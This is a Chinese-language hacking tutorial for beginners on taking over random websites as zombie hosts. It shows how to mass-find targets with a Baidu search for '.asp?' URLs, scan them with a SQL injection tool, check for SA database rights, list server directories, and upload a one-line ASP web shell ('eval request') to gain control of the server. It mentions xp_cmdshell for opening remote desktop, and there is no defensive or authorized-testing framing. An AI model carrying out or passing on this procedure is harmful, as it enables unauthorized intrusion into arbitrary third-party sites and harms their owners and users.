許多朋友老是問怎么才能入侵一個網(wǎng)站,也有的朋友問有沒有上傳木馬的空間,或者問怎么拿到一只肉雞玩。其實(shí)抓肉雞是一個很簡單的事情。這里我們就再現(xiàn)經(jīng)典的SQL注入漏洞,包每一個讀者都能拿到網(wǎng)站肉雞。
搜漏的技巧——尋找有漏瀾的主機(jī)
首先準(zhǔn)備的是一個SQL注入工具“啊D注入工具V2.3”。這可是一個經(jīng)典的SQL注入工具了。不知道什么是SQL注入的朋友,可以上網(wǎng)查一下資料。既然拿出“啊D注入工具v2.3”,那么肯定是要進(jìn)行SQL注入攻擊了,但問題是如何尋找有SQL注入漏洞的主機(jī)呢?一個非常簡單的技巧那就是百度與啊D結(jié)合,迅速尋找到上萬臺有SQL注入漏洞的網(wǎng)站主機(jī)。
百度找鏈接
打開百度搜索。在頁面中點(diǎn)擊“高級”鏈接,打開百度的高級搜索頁面。在“包含以下全部的關(guān)鍵詞”中輸入“.asp?”,將“搜索結(jié)果顯示條數(shù)”設(shè)置為“每頁顯示100條”,“語言”設(shè)置為“全部語言”。將“關(guān)鍵詞位置”設(shè)置為“僅在網(wǎng)頁的URL中”,最后點(diǎn)擊“百度一下”按鈕,即可打開搜索結(jié)果面面了??梢钥吹巾撁嬷酗@示的搜索結(jié)果,都是形如“http://www.***.com/*.asp?*=**之類的字符或數(shù)字型鏈接地址。對SQL注入略有所知的用戶。肯定都會忍不住打開一個鏈接,然后開始測試鏈接是否存在SQL注入漏洞了吧?
一個秘不外傳的技巧
一般的黑客書籍上面,都是教菜鳥們一個一個地檢測鏈接地址。不管是手工檢測也好,還是用工具檢測也好,都是非常麻煩的。也許試到頭昏眼花,也不一定找得到SQL注入漏洞鏈接地址。其實(shí)有更高效的方法可以讓尋找SQL注入漏洞自動化許多。
直接在瀏覽器地址欄中。復(fù)制搜索結(jié)果網(wǎng)頁的鏈接地址,這里為“http://www.baidu.com/s?tn=baiduadvq1=.asp%3Fq2=q3=q4=rn=100lm=0ct=Oft=q5=2&q6=”。復(fù)制后,運(yùn)行“啊D注入工具v2.3”,點(diǎn)擊左側(cè)邊欄中的“注入檢測”一“掃描注入點(diǎn)”,在右邊窗口的地址欄中。粘貼剛才復(fù)制的搜索鏈接。然后點(diǎn)擊地址欄后的“打開網(wǎng)頁”按鈕,在窗口中就會顯示剛才的搜索結(jié)果頁面了。
此時,表面看起來與在瀏覽器中進(jìn)行搜索沒有什么兩樣,但實(shí)際上啊D注入工具已經(jīng)開始自動分析搜索結(jié)果中的每一個鏈接地址。并檢測是否存在SQL注入漏洞了。在下方的檢測框中會顯示“正在檢測xx個鏈接”,多等一會兒,讓所有鏈接檢測完畢。然后就可以看到檢測框中列表顯示存在SQL注入漏洞的鏈接地址了。如果在當(dāng)前頁中沒有檢測到多少漏洞鏈接,那么可在上方的窗口頁面中,點(diǎn)擊搜索結(jié)果下一頁鏈接,繼續(xù)檢測漏洞鏈接。最多一分鐘,你就可以看到列表中顯示數(shù)十個漏洞鏈接地址了。
由于SQL注入攻擊曾經(jīng)很泛濫。因此許多網(wǎng)站都打上了SQL注入漏洞的補(bǔ)丁?,F(xiàn)在要找存在SQL注入漏洞的站點(diǎn)是非常難了。不過巧妙的將百度搜索功能與啊D注入工具的頁面鏈接分析檢測功能相結(jié)合,就可以很輕松的找到成千上萬個SQL注入漏洞鏈接地址了。上面的搜索結(jié)果就有4800多萬條,這其中就算只有1%的漏洞概率。也有數(shù)十萬個漏洞鏈接地址!菜鳥們再也不用擔(dān)心出現(xiàn)漏洞過時,找不到漏洞站點(diǎn)攻擊練手的現(xiàn)象了。
上面我們使用的是關(guān)鍵詞“.asp?”進(jìn)行搜索,還可以使用其它的關(guān)鍵詞進(jìn)行搜索,例如“www.asp?”、“edu.asp?”、“電影.asp?”、“aspx?”、“.js7”等??梢詳U(kuò)大搜索結(jié)果。~Google之類的國外搜索引擎進(jìn)行搜索,則可以找到更多的漏洞站點(diǎn)。
輕松拿下漏洞站點(diǎn)
找到了存在SQL注入漏洞的站點(diǎn)后,如何進(jìn)行攻擊呢?SQL注入攻擊的方式多種多樣。比如猜解管理員密碼和后臺登錄頁面,直接利用xp_cmdshell開3389或上傳木馬等。這里我們選擇的當(dāng)然是最簡單的方法,什么權(quán)限、后臺密碼破解之類的都不用——利用SA上傳木馬
檢測SA權(quán)限
在檢測到的漏洞鏈接地址列表中,右鍵點(diǎn)擊某個漏洞鏈接,在彈出菜單中選擇“注入檢測”命令,切換到“SQL注入檢測”界面。點(diǎn)擊右邊界面中的“檢測”按鈕。將自動檢測該鏈接是否存在SQL注入漏洞。如果存在的話,則顯示當(dāng)前數(shù)據(jù)庫類型、用戶和權(quán)限等信息。詳細(xì)看看下方顯示的結(jié)果。如果看到“SA”和“多句執(zhí)行”,那么恭喜小菜們,你基本上可以肯定的拿下這個網(wǎng)站。獲得一個肉雞了!
如果檢測的鏈接不具有SA權(quán)限,那么可以換一個鏈接地址,反正掃描到的漏洞鏈接是一大把,總有許多是具備sA權(quán)限的。
列目錄。找網(wǎng)站路徑
點(diǎn)擊左側(cè)“相關(guān)工具”——“目錄查看”,在目錄查看界面的“檢測位置”中,輸入要查看文件的目錄路徑,點(diǎn)擊“開始檢測”按鈕。即可顯示該目錄下的文件及子文件夾了。一般來說,網(wǎng)站的路徑都是位于非系統(tǒng)盤的,大部分是位于“D:/WEB”中,可以直接查看該路徑中的文件信息。如果該文件夾不存在,則只有從C盤D盤等根目錄慢慢查找網(wǎng)站的路徑了。
上傳木馬
用記事本編寫一個后綴名,asp的文件。內(nèi)容如下:
<%eval request(“pass”)%>
注意。在寫入文件時,上面代碼中的“pass”就是后面要用到的連接密碼。需要改為自己想要的密碼。將文件保存為“muma.asp”。然后在啊D注入工具中,點(diǎn)擊左側(cè)“相關(guān)工具”——“CMD,上傳”項(xiàng)。在命令執(zhí)行與上傳界面下方的“上傳文件”中,點(diǎn)擊下方的“本地文件”瀏覽按鈕,瀏覽指定剛才保存的“muma.asp”文件。在“目標(biāo)路徑”中設(shè)定文件保存路徑,注意要指定保存在網(wǎng)站路徑之下。這里為“D:/WEB/muma.asp”。最后點(diǎn)擊“上傳”按鈕,就可以成功的將木馬上傳到網(wǎng)站根目錄下了。上傳完成后。再用“目錄查看”功能,查看一下文件是否上傳成功。
連接木馬
運(yùn)行桂林老兵的木馬后門管理工具“WebshelIControl v2.0”。點(diǎn)擊菜單“工具”——“shell管理”命令,打開Shell管理窗口。在下方的“地址”中輸入剛才上傳的ASP木馬鏈接地址及連接密碼,點(diǎn)擊“連接”按鈕。即可連接打開Webshell。在Webshe LI管理窗口中,可以查看任意目錄中的文件,并可以上傳、下載或編輯任意文件。
現(xiàn)在這臺網(wǎng)站服務(wù)器基本處于我們的控制之下了,要上傳木馬,或者將網(wǎng)站作為自己的免費(fèi)空間都是很容易的了。至于進(jìn)一步提升權(quán)限。安裝遠(yuǎn)程控制木馬則需要一定的入侵知識。留待小菜們以后慢慢提高學(xué)習(xí)吧。